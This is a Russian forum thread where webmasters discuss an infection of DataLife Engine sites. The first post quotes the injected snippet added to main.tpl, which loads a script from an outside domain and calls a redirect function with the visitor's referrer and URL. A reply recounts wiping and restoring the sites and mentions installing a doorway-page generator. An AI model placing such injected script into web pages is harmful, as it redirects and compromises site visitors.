Появляется в Dle разных версий (8.5, 9.0)
Изкареживает main.tpl (весь код идет в строку) пишет внизу страницы перез закрытием body
Код:
<!--x813n--><script type="text/javascript" src='http://in-disquise.com/jquery.js'></script>
<script>var d=document.location;sp_redirect.sp_redirect(document.referrer,d.hostname,d.hostname+d.pathname+d.search);</script><!--/x813n-->
Кто сталкивался.
Заранее спасибо!
у меня 2 сайта подобным образом заразились, выкачивал полностью оба и поиском по файлам искал зараженный html/php, НИЧЕГО не нашел. Т.е. это гавно вероятнее всего как-то проникло в SQL базу и оттуда подгружает этот вирус при каждом запросе. Я никак не смог это победить, пришлось полностью сайт грохать, прибивать базу SQL и создавать все заново
, хорошо что был относительно свежий и незараженный бэкап базы, т.е. я DLE переустановил "с нуля" и базу подсунул из бэкапа. А на второй зараженный сайт вообще забил т.к. он не на DLE, я его покупал, кода его не знаю и ничего с этим вирусом сделать не могу
вот этот второй зараженный сайт -
Для просмотра ссылки Войди или Зарегистрируйся , заходите осторожнее, код вируса в самом низу страницы -
<script src="Для просмотра ссылки Войди или Зарегистрируйся"></script>
касательно предыдущего поста. Надоело терпеть вирус, грохнул полностью и этот второй сайт
Для просмотра ссылки Войди или Зарегистрируйся, поставил на него дорген SED старенький (v3.2), теперь никаких вирусов, только бесконечно разрастающийся контент и кол-во страниц в индексе